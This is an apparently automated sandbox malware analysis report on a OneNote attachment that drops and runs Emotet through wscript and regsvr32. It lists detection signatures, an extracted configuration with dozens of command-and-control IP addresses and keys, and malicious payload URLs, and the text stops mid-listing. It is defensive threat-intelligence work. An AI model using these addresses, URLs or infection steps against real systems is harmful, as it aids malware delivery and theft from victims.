Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Form - 16 Mar, 2023.one

Overview

General Information

Sample Name:Form - 16 Mar, 2023.one
Analysis ID:828882
MD5:fdb11bd1fb6eba5cb985a4bd5edda765
SHA1:ad09e5d26784b4c56232ce74725d38c1e34647ea
SHA256:8dbe6329f5086cd8ea55002897ca64d8a938ebb57c8a91d08f6cd927c3586f4a
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • ONENOTE.EXE (PID: 4088 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Form - 16 Mar, 2023.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 5868 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 976 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 4692 cmdline: "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 1496 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DWxyui\KGQLMqgYfV.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • ONENOTEM.EXE (PID: 5936 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • ONENOTEM.EXE (PID: 4768 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5MXrQigAaAI4=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2dnqRigAnAIA="]}
SourceRuleDescriptionAuthorStrings
Form - 16 Mar, 2023.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\Form - 16 Mar, 2023.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security
      SourceRuleDescriptionAuthorStrings
      00000008.00000002.617908467.0000000001220000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
          00000007.00000002.435040931.0000000000C30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              00000008.00000002.617991497.0000000002A51000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                SourceRuleDescriptionAuthorStrings
                7.2.regsvr32.exe.c30000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  8.2.regsvr32.exe.1220000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    8.2.regsvr32.exe.1220000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      7.2.regsvr32.exe.c30000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                        Malware Analysis System Evasion

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5868, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll, ProcessId: 976, ProcessName: regsvr32.exe
                        Timestamp:192.168.2.466.228.32.314970070802404330 03/17/23-16:45:57.481213
                        SID:2404330
                        Source Port:49700
                        Destination Port:7080
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.4164.90.222.65497074432404308 03/17/23-16:46:23.322113
                        SID:2404308
                        Source Port:49707
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.4167.172.199.1654970680802404308 03/17/23-16:46:17.940894
                        SID:2404308
                        Source Port:49706
                        Destination Port:8080
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.4104.168.155.1434970880802404302 03/17/23-16:46:27.711698
                        SID:2404302
                        Source Port:49708
                        Destination Port:8080
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.4182.162.143.56497014432404312 03/17/23-16:46:04.229854
                        SID:2404312
                        Source Port:49701
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.491.121.146.474969880802404344 03/17/23-16:45:48.322318
                        SID:2404344
                        Source Port:49698
                        Destination Port:8080
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Form - 16 Mar, 2023.oneReversingLabs: Detection: 38%
                        Source: Form - 16 Mar, 2023.oneVirustotal: Detection: 17%Perma Link
                        Source: https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/yAvira URL Cloud: Label: malware
                        Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
                        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMAvira URL Cloud: Label: malware
                        Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
                        Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
                        Source: https://104.168.155.143:8080/iAvira URL Cloud: Label: malware
                        Source: https://167.172.199.165:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/#Avira URL Cloud: Label: malware
                        Source: https://104.168.155.143:8080/gAvira URL Cloud: Label: malware
                        Source: https://163.44.196.120:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/Avira URL Cloud: Label: malware
                        Source: https://bbvoyage.com:443/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
                        Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
                        Source: https://penshorn.org/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
                        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMAvira URL Cloud: Label: malware
                        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/RAvira URL Cloud: Label: malware
                        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/Avira URL Cloud: Label: malware
                        Source: https://164.90.222.65/0/Avira URL Cloud: Label: malware
                        Source: https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/dllAvira URL Cloud: Label: malware
                        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
                        Source: https://167.172.199.165:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/Avira URL Cloud: Label: malware
                        Source: http://softwareulike.com/cWIYxWMPkK/yMAvira URL Cloud: Label: malware
                        Source: https://91.121.146.47:8080/Avira URL Cloud: Label: malware
                        Source: https://66.228.32.31:7080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/Avira URL Cloud: Label: malware
                        Source: https://164.90.222.65/kjgfzohhcvsym/ggkrpukmvfsdmfdi/Avira URL Cloud: Label: malware
                        Source: https://163.44.196.120:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/f4)Avira URL Cloud: Label: malware
                        Source: https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/Avira URL Cloud: Label: malware
                        Source: https://www.gomespontes.com.br/logs/pd/vMAvira URL Cloud: Label: malware
                        Source: https://163.44.196.120:8080/aAvira URL Cloud: Label: malware
                        Source: https://163.44.196.120:8080/m/LowAvira URL Cloud: Label: malware
                        Source: https://163.44.196.120:8080/cAvira URL Cloud: Label: malware
                        Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
                        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/OAvira URL Cloud: Label: malware
                        Source: https://163.44.196.120:8080/hAvira URL Cloud: Label: malware
                        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/Avira URL Cloud: Label: malware
                        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMAvira URL Cloud: Label: malware
                        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/35047Avira URL Cloud: Label: malware
                        Source: https://104.168.155.143:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/Avira URL Cloud: Label: malware
                        Source: https://penshorn.org:443/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
                        Source: https://www.gomespontes.com.br/logs/pd/ublicAvira URL Cloud: Label: malware
                        Source: bbvoyage.comVirustotal: Detection: 8%Perma Link
                        Source: penshorn.orgVirustotal: Detection: 10%Perma Link
                        Source: http://ozmeydan.com/cekici/9/Virustotal: Detection: 21%Perma Link
                        Source: http://softwareulike.com/cWIYxWMPkK/Virustotal: Detection: 21%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dllReversingLabs: Detection: 58%
                        Source: C:\Windows\System32\DWxyui\KGQLMqgYfV.dll (copy)ReversingLabs: Detection: 58%
                        Source: 00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5MXrQigAaAI4=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2dnqRigAnAIA="]}
                        Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.4:49697 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.4:49707 version: TLS 1.2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008D28 FindFirstFileExW,7_2_0000000180008D28

                        Software Vulnerabilities

                        barindex
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe

                        Networking

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 31.31.196.172 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeDomain query: bbvoyage.com
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                        Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49707 -> 164.90.222.65:443
                        Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49698 -> 91.121.146.47:8080
                        Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49700 -> 66.228.32.31:7080
                        Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49701 -> 182.162.143.56:443
                        Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49706 -> 167.172.199.165:8080
                        Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49708 -> 104.168.155.143:8080
                        Source: Malware configuration extractorIPs: 91.121.146.47:8080
                        Source: Malware configuration extractorIPs: 66.228.32.31:7080
                        Source: Malware configuration extractorIPs: 182.162.143.56:443
                        Source: Malware configuration extractorIPs: 187.63.160.88:80
                        Source: Malware configuration extractorIPs: 167.172.199.165:8080
                        Source: Malware configuration extractorIPs: 164.90.222.65:443
                        Source: Malware configuration extractorIPs: 104.168.155.143:8080
                        Source: Malware configuration extractorIPs: 163.44.196.120:8080
                        Source: Malware configuration extractorIPs: 160.16.142.56:8080
                        Source: Malware configuration extractorIPs: 159.89.202.34:443
                        Source: Malware configuration extractorIPs: 159.65.88.10:8080
                        Source: Malware configuration extractorIPs: 186.194.240.217:443
                        Source: Malware configuration extractorIPs: 149.56.131.28:8080
                        Source: Malware configuration extractorIPs: 72.15.201.15:8080
                        Source: Malware configuration extractorIPs: 1.234.2.232:8080
                        Source: Malware configuration extractorIPs: 82.223.21.224:8080
                        Source: Malware configuration extractorIPs: 206.189.28.199:8080
                        Source: Malware configuration extractorIPs: 169.57.156.166:8080
                        Source: Malware configuration extractorIPs: 107.170.39.149:8080
                        Source: Malware configuration extractorIPs: 103.43.75.120:443
                        Source: Malware configuration extractorIPs: 91.207.28.33:8080
                        Source: Malware configuration extractorIPs: 213.239.212.5:443
                        Source: Malware configuration extractorIPs: 45.235.8.30:8080
                        Source: Malware configuration extractorIPs: 119.59.103.152:8080
                        Source: Malware configuration extractorIPs: 164.68.99.3:8080
                        Source: Malware configuration extractorIPs: 95.217.221.146:8080
                        Source: Malware configuration extractorIPs: 153.126.146.25:7080
                        Source: Malware configuration extractorIPs: 197.242.150.244:8080
                        Source: Malware configuration extractorIPs: 202.129.205.3:8080
                        Source: Malware configuration extractorIPs: 103.132.242.26:8080
                        Source: Malware configuration extractorIPs: 139.59.126.41:443
                        Source: Malware configuration extractorIPs: 110.232.117.186:8080
                        Source: Malware configuration extractorIPs: 183.111.227.137:8080
                        Source: Malware configuration extractorIPs: 5.135.159.50:443
                        Source: Malware configuration extractorIPs: 201.94.166.162:443
                        Source: Malware configuration extractorIPs: 103.75.201.2:443
                        Source: Malware configuration extractorIPs: 79.137.35.198:8080
                        Source: Malware configuration extractorIPs: 172.105.226.75:8080
                        Source: Malware configuration extractorIPs: 94.23.45.86:4143
                        Source: Malware configuration extractorIPs: 115.68.227.76:8080
                        Source: Malware configuration extractorIPs: 153.92.5.27:8080
                        Source: Malware configuration extractorIPs: 167.172.253.162:8080
                        Source: Malware configuration extractorIPs: 188.44.20.25:443
                        Source: Malware configuration extractorIPs: 147.139.166.154:8080
                        Source: Malware configuration extractorIPs: 129.232.188.93:443
                        Source: Malware configuration extractorIPs: 173.212.193.249:8080
                        Source: Malware configuration extractorIPs: 185.4.135.165:8080
                        Source: Malware configuration extractorIPs: 45.176.232.124:443
                        Source: Joe Sandbox ViewASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
                        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                        Source: global trafficHTTP traffic detected: POST /kjgfzohhcvsym/ggkrpukmvfsdmfdi/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
                        Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
                        Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
                        Source: global trafficTCP traffic: 192.168.2.4:49698 -> 91.121.146.47:8080
                        Source: global trafficTCP traffic: 192.168.2.4:49700 -> 66.228.32.31:7080
                        Source: global trafficTCP traffic: 192.168.2.4:49706 -> 167.172.199.165:8080
                        Source: global trafficTCP traffic: 192.168.2.4:49708 -> 104.168.155.143:8080
                        Source: global trafficTCP traffic: 192.168.2.4:49709 -> 163.44.196.120:8080
                        Source: unknownNetwork traffic detected: IP country count 18
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.155.143
                        Source: wscript.exe, 00000001.00000002.454746184.0000000005004000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586761426.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.519602421.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.521824072.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586322272.00000000011C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: regsvr32.exe, 00000008.00000003.521824072.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Low
                        Source: regsvr32.exe, 00000008.00000003.522318920.000000000117C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586322272.000000000117C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.000000000118C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586721940.000000000118B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.519602421.000000000117C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586700754.0000000001186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: regsvr32.exe, 00000008.00000003.586322272.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.519602421.000000000117C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: regsvr32.exe, 00000008.00000003.514049481.000000000322E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?face02ee8e0f8
                        Source: wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 